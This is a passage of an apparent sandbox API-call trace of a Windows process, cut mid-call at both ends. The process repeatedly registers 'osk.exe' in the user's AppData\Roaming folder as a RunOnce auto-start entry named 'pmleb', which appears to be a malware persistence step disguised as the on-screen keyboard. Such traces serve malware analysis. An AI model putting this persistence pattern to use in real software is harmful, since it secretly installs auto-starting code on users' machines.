lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.399] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.399] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.399] RegCloseKey (hKey=0x280) returned 0x0 [0078.400] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.400] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.400] SetTimer (hWnd=0x20280, nIDEvent=0x201f, uElapse=0xa, lpTimerFunc=0x0) returned 0x201f [0078.400] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.411] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.411] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.411] KillTimer (hWnd=0x20280, uIDEvent=0x201f) returned 1 [0078.411] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.411] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.412] IUnknown:Release (This=0x787518) returned 0x1 [0078.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.412] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.412] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.412] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.412] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.412] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0078.412] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.412] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x21 [0078.412] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.413] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x20 [0078.413] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.413] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.413] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.413] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.413] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.413] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.413] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.413] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.414] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.414] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.414] RegCloseKey (hKey=0x280) returned 0x0 [0078.414] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.414] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.414] SetTimer (hWnd=0x20280, nIDEvent=0x2020, uElapse=0xa, lpTimerFunc=0x0) returned 0x2020 [0078.414] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.438] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.438] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.438] KillTimer (hWnd=0x20280, uIDEvent=0x2020) returned 1 [0078.438] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.438] IUnknown:Release (This=0x787518) returned 0x1 [0078.438] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.438] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.439] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.439] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.439] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0078.439] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.439] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x22 [0078.439] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.440] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x21 [0078.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.440] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.440] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.440] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.440] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.440] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.440] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.441] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.441] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.441] RegCloseKey (hKey=0x280) returned 0x0 [0078.441] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.441] SetTimer (hWnd=0x20280, nIDEvent=0x2021, uElapse=0xa, lpTimerFunc=0x0) returned 0x2021 [0078.441] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.442] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.442] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.442] KillTimer (hWnd=0x20280, uIDEvent=0x2021) returned 1 [0078.443] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.443] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.443] IUnknown:Release (This=0x787518) returned 0x1 [0078.443] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.443] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.443] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.443] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.443] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.443] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0078.443] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.443] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x23 [0078.443] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.444] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x22 [0078.444] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.444] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.444] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.444] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.444] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.445] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.445] RegCreateKeyExA (in: hKey=0x80000001, 